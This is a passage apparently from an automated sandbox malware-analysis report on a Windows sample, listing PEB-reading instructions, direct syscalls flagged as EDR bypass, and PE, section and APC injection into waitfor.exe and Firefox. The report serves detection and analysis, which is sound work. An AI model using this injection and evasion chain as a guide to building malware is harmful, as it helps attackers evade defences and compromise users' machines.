                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152E9E0 mov eax, dword ptr fs:[00000030h]4_2_0152E9E0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D29F9 mov eax, dword ptr fs:[00000030h]4_2_014D29F9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D29F9 mov eax, dword ptr fs:[00000030h]4_2_014D29F9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015289B3 mov esi, dword ptr fs:[00000030h]4_2_015289B3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015289B3 mov eax, dword ptr fs:[00000030h]4_2_015289B3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015289B3 mov eax, dword ptr fs:[00000030h]4_2_015289B3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A09AD mov eax, dword ptr fs:[00000030h]4_2_014A09AD
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A09AD mov eax, dword ptr fs:[00000030h]4_2_014A09AD
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B2840 mov ecx, dword ptr fs:[00000030h]4_2_014B2840
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A4859 mov eax, dword ptr fs:[00000030h]4_2_014A4859
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A4859 mov eax, dword ptr fs:[00000030h]4_2_014A4859
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D0854 mov eax, dword ptr fs:[00000030h]4_2_014D0854
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152E872 mov eax, dword ptr fs:[00000030h]4_2_0152E872
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152E872 mov eax, dword ptr fs:[00000030h]4_2_0152E872
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01536870 mov eax, dword ptr fs:[00000030h]4_2_01536870
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01536870 mov eax, dword ptr fs:[00000030h]4_2_01536870
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152C810 mov eax, dword ptr fs:[00000030h]4_2_0152C810
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154483A mov eax, dword ptr fs:[00000030h]4_2_0154483A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154483A mov eax, dword ptr fs:[00000030h]4_2_0154483A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C2835 mov eax, dword ptr fs:[00000030h]4_2_014C2835
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C2835 mov eax, dword ptr fs:[00000030h]4_2_014C2835
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C2835 mov eax, dword ptr fs:[00000030h]4_2_014C2835
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C2835 mov ecx, dword ptr fs:[00000030h]4_2_014C2835
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C2835 mov eax, dword ptr fs:[00000030h]4_2_014C2835
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C2835 mov eax, dword ptr fs:[00000030h]4_2_014C2835
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA830 mov eax, dword ptr fs:[00000030h]4_2_014DA830
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE8C0 mov eax, dword ptr fs:[00000030h]4_2_014CE8C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015708C0 mov eax, dword ptr fs:[00000030h]4_2_015708C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156A8E4 mov eax, dword ptr fs:[00000030h]4_2_0156A8E4
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DC8F9 mov eax, dword ptr fs:[00000030h]4_2_014DC8F9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DC8F9 mov eax, dword ptr fs:[00000030h]4_2_014DC8F9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A0887 mov eax, dword ptr fs:[00000030h]4_2_014A0887
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152C89D mov eax, dword ptr fs:[00000030h]4_2_0152C89D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01572B57 mov eax, dword ptr fs:[00000030h]4_2_01572B57
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01572B57 mov eax, dword ptr fs:[00000030h]4_2_01572B57
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01572B57 mov eax, dword ptr fs:[00000030h]4_2_01572B57
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01572B57 mov eax, dword ptr fs:[00000030h]4_2_01572B57
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154EB50 mov eax, dword ptr fs:[00000030h]4_2_0154EB50
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01536B40 mov eax, dword ptr fs:[00000030h]4_2_01536B40
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01536B40 mov eax, dword ptr fs:[00000030h]4_2_01536B40
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01548B42 mov eax, dword ptr fs:[00000030h]4_2_01548B42
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156AB40 mov eax, dword ptr fs:[00000030h]4_2_0156AB40
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01498B50 mov eax, dword ptr fs:[00000030h]4_2_01498B50
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01554B4B mov eax, dword ptr fs:[00000030h]4_2_01554B4B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01554B4B mov eax, dword ptr fs:[00000030h]4_2_01554B4B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149CB7E mov eax, dword ptr fs:[00000030h]4_2_0149CB7E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151EB1D mov eax, dword ptr fs:[00000030h]4_2_0151EB1D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151EB1D mov eax, dword ptr fs:[00000030h]4_2_0151EB1D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151EB1D mov eax, dword ptr fs:[00000030h]4_2_0151EB1D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151EB1D mov eax, dword ptr fs:[00000030h]4_2_0151EB1D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151EB1D mov eax, dword ptr fs:[00000030h]4_2_0151EB1D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151EB1D mov eax, dword ptr fs:[00000030h]4_2_0151EB1D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151EB1D mov eax, dword ptr fs:[00000030h]4_2_0151EB1D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151EB1D mov eax, dword ptr fs:[00000030h]4_2_0151EB1D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151EB1D mov eax, dword ptr fs:[00000030h]4_2_0151EB1D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01574B00 mov eax, dword ptr fs:[00000030h]4_2_01574B00
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CEB20 mov eax, dword ptr fs:[00000030h]4_2_014CEB20
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CEB20 mov eax, dword ptr fs:[00000030h]4_2_014CEB20
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01568B28 mov eax, dword ptr fs:[00000030h]4_2_01568B28
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01568B28 mov eax, dword ptr fs:[00000030h]4_2_01568B28
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154EBD0 mov eax, dword ptr fs:[00000030h]4_2_0154EBD0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C0BCB mov eax, dword ptr fs:[00000030h]4_2_014C0BCB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C0BCB mov eax, dword ptr fs:[00000030h]4_2_014C0BCB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C0BCB mov eax, dword ptr fs:[00000030h]4_2_014C0BCB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A0BCD mov eax, dword ptr fs:[00000030h]4_2_014A0BCD
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A0BCD mov eax, dword ptr fs:[00000030h]4_2_014A0BCD
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A0BCD mov eax, dword ptr fs:[00000030h]4_2_014A0BCD
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152CBF0 mov eax, dword ptr fs:[00000030h]4_2_0152CBF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CEBFC mov eax, dword ptr fs:[00000030h]4_2_014CEBFC
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A8BF0 mov eax, dword ptr fs:[00000030h]4_2_014A8BF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A8BF0 mov eax, dword ptr fs:[00000030h]4_2_014A8BF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A8BF0 mov eax, dword ptr fs:[00000030h]4_2_014A8BF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01554BB0 mov eax, dword ptr fs:[00000030h]4_2_01554BB0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01554BB0 mov eax, dword ptr fs:[00000030h]4_2_01554BB0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0BBE mov eax, dword ptr fs:[00000030h]4_2_014B0BBE
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0BBE mov eax, dword ptr fs:[00000030h]4_2_014B0BBE
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0A5B mov eax, dword ptr fs:[00000030h]4_2_014B0A5B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0A5B mov eax, dword ptr fs:[00000030h]4_2_014B0A5B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A6A50 mov eax, dword ptr fs:[00000030h]4_2_014A6A50
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A6A50 mov eax, dword ptr fs:[00000030h]4_2_014A6A50
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A6A50 mov eax, dword ptr fs:[00000030h]4_2_014A6A50
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A6A50 mov eax, dword ptr fs:[00000030h]4_2_014A6A50
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A6A50 mov eax, dword ptr fs:[00000030h]4_2_014A6A50
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A6A50 mov eax, dword ptr fs:[00000030h]4_2_014A6A50
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A6A50 mov eax, dword ptr fs:[00000030h]4_2_014A6A50
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DCA6F mov eax, dword ptr fs:[00000030h]4_2_014DCA6F
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DCA6F mov eax, dword ptr fs:[00000030h]4_2_014DCA6F
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DCA6F mov eax, dword ptr fs:[00000030h]4_2_014DCA6F
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151CA72 mov eax, dword ptr fs:[00000030h]4_2_0151CA72
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151CA72 mov eax, dword ptr fs:[00000030h]4_2_0151CA72
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154EA60 mov eax, dword ptr fs:[00000030h]4_2_0154EA60
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152CA11 mov eax, dword ptr fs:[00000030h]4_2_0152CA11
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CEA2E mov eax, dword ptr fs:[00000030h]4_2_014CEA2E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DCA24 mov eax, dword ptr fs:[00000030h]4_2_014DCA24
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DCA38 mov eax, dword ptr fs:[00000030h]4_2_014DCA38
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C4A35 mov eax, dword ptr fs:[00000030h]4_2_014C4A35
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C4A35 mov eax, dword ptr fs:[00000030h]4_2_014C4A35
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014F6ACC mov eax, dword ptr fs:[00000030h]4_2_014F6ACC
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014F6ACC mov eax, dword ptr fs:[00000030h]4_2_014F6ACC
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014F6ACC mov eax, dword ptr fs:[00000030h]4_2_014F6ACC
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A0AD0 mov eax, dword ptr fs:[00000030h]4_2_014A0AD0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D4AD0 mov eax, dword ptr fs:[00000030h]4_2_014D4AD0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D4AD0 mov eax, dword ptr fs:[00000030h]4_2_014D4AD0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DAAEE mov eax, dword ptr fs:[00000030h]4_2_014DAAEE
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DAAEE mov eax, dword ptr fs:[00000030h]4_2_014DAAEE
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AEA80 mov eax, dword ptr fs:[00000030h]4_2_014AEA80
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AEA80 mov eax, dword ptr fs:[00000030h]4_2_014AEA80
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AEA80 mov eax, dword ptr fs:[00000030h]4_2_014AEA80
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AEA80 mov eax, dword ptr fs:[00000030h]4_2_014AEA80
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtTerminateThread: Direct from: 0x77672FCCJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtAllocateVirtualMemory: Direct from: 0x77672BECJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtAllocateVirtualMemory: Direct from: 0x77673C9CJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeMemory written: C:\Users\user\Desktop\suBpo1g13Q.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: NULL target: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: NULL target: C:\Windows\SysWOW64\waitfor.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\waitfor.exeThread register set: target process: 7532Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\waitfor.exeThread APC queued: target process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess created: C:\Users\user\Desktop\suBpo1g13Q.exe "C:\Users\user\Desktop\suBpo1g13Q.exe"Jump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess created: C:\Users\user\Desktop\suBpo1g13Q.exe "C:\Users\user\Desktop\suBpo1g13Q.exe"Jump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeProcess created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: iBkWOgpZKSoi.exe, 00000006.00000000.1554508698.0000000000BA1000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3811475656.0000000000BA0000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710069200.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: iBkWOgpZKSoi.exe, 00000006.00000000.1554508698.0000000000BA1000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3811475656.0000000000BA0000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710069200.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
